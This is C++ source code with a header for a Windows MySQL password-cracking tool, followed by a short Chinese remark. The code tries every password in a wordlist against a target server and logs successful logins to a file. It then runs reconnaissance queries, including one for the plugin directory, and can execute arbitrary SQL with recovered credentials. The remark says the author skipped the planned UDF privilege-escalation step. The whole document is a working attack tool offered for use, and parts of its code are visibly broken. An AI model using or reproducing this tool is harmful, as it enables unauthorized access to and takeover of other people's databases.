#include "StdAfx.h" #include "Sql.h" #include <windows.h> #include <stdio.h> #include <mysql.h> #pragma comment(linker,"/nodefaultlib:LIBCMT.lib") #pragma comment(linker,"/nodefaultlib:MSVCRTD.lib") #if defined _DEBUG #pragma comment(lib, "mysqlclient_debug.lib") #else #pragma comment(lib, "mysqlclient.lib") #endif #pragma comment(lib, "wsock32.lib") #pragma comment(lib, "Advapi32.lib") Sql::Sql(void) { } Sql::~Sql(void) { } void Sql::writefiles(char* buffer) { FILE* fp = NULL; fp = fopen("succ.txt","a+"); if (fp != NULL) { fwrite(buffer,strlen(buffer),1,fp); } fclose(fp); } void Sql::Usage(char* help) { printf("[-]:%s Usage:->192.168.1.1->root->crack ",help); printf("[-]:%s Usage:->192.168.1.1->root->sql->passwordroot->select user() ",help); //return; exit(0); } int Sql::crack_mysql(char* ServerHost,char* Username,char* password) { MYSQL *conn; MYSQL_RES *res; MYSQL_ROW row; char plugs[1024]; conn = mysql_init(NULL); char buffer[1024] = {0}; int count = 0; char* Sql_exec[4] = {"select version()","select user()","show databases","select @@plugin_dir"}; if (!mysql_real_connect(conn,ServerHost, Username,password,"mysql",0,NULL,CLIENT_MULTI_STATEMENTS)) { printf("Host:%s->Username:%s->Password:%s failed ",ServerHost,Username,password); mysql_close(conn); }else { memset(buffer,0,sizeof(buffer)); sprintf_s(buffer,"Host:%s->Username:%s->Password:%s successfuly ",ServerHost,Username,password); printf(buffer); writefiles(buffer); if (mysql_select_db(conn,"mysql")) { printf("Select Errors the mysql database! "); } for (int i =0;i<4;i++) { if (mysql_query(conn,Sql_exec[i])) { fprintf(stderr,"%s ",mysql_error(conn)); //exit(1); } res = mysql_use_result(conn); //res = mysql_store_result(conn); while ((row = mysql_fetch_row(res)) != NULL) { sprintf_s(plugs,"%s",row[0]); printf("%s ",plugs); } } mysql_free_result(res); mysql_close(conn); } return 0; } int Sql::sql_exec(char* ServerHost,char* Username,char* password,char* sql) { MYSQL *conn; MYSQL_RES *res; MYSQL_ROW row; char plugs[1024]; conn = mysql_init(NULL); int count = 0; if (mysql_real_connect(conn,ServerHost, Username,password,"mysql",0,NULL,CLIENT_MULTI_STATEMENTS)) { fprintf(stderr,"Host:%s->Username:%s->Password:%s successfuly ",ServerHost,Username,password); if (mysql_select_db(conn,"mysql")) { printf("Select Errors the mysql database! "); } if (mysql_query(conn,sql)) { fprintf(stderr,"%s ",mysql_error(conn)); //exit(1); } if (!(res = mysql_store_result(conn))) { return -2; } while ((row = mysql_fetch_row(res)) != NULL) { ZeroMemory(plugs,sizeof(plugs)); sprintf_s(plugs,"%s",row[0]); printf("%s ",plugs); } mysql_free_result(res); mysql_close(conn); }else { fprintf(stderr,"Host:%s->Username:%s->Password:%s failed ",ServerHost,Username,password); } return 0; } int main(int argc,char* argv[]) { char* ServerHost = argv[1]; char* Username = argv[2]; char* method = argv[3]; Sql* newsql = NULL; FILE* fp = NULL; char buffer[MAX_PATH] = {0}; if (argc < 3) { newsql->Usage(argv[0]); } if (strstr(method,"crack")) { fp = fopen("pass.txt","rb"); if (fp == NULL) { printf("Error:%d, pwd.txt not found ",GetLastError()); return 0; } while (fgets(buffer,MAX_PATH,fp) != NULL) { if (buffer[strlen(buffer) - 2] == ' ') { buffer[strlen(buffer) - 2] = '�'; } if (buffer[strlen(buffer) - 2] == ' ') { buffer[strlen(buffer) - 2] = '�'; } newsql->crack_mysql(ServerHost,Username,buffer); memset(buffer,0,sizeof(buffer)); } fclose(fp); }else if (strstr(method,"sql")) { char* password = argv[4]; char* sql = argv[5]; newsql->sql_exec(ServerHost,Username,password,sql); } return 0; }
头文件
#pragma once class Sql { public: Sql(void); ~Sql(void); void Usage(char*); int crack_mysql(char* ServerHost,char* Username,char* password); int sql_exec(char* ServerHost,char* Username,char* password,char* sql); void writefiles(char* buffer); };
本来还想写一个UDF 导出提权的,懒得写了。有兴趣的人可以自己去写。